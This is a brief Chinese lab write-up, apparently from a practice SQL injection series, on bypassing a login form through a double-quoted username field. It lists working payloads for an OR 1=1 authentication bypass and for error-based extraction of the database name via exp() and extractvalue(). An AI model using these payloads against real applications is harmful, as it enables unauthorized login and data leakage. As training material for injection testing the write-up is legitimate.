知识点:
- 错误注入
- 这里的语法是 where username=""
- 直接进行双引号绕过
通过admin admin登录发现还是没有任何回显
通过bp进行抓包;测试输入内容
构造payload:username=a'+or+1=1#
发现不能成功登录

尝试换成双引号
构造payload:username=a"+or+1=1#
成功登录了

尝试进行错误注入
构造payload:username=a"+or+exp(710)#
错误成功打印到页面上了

尝试利用错误注入获取数据库名
构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#
成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了
10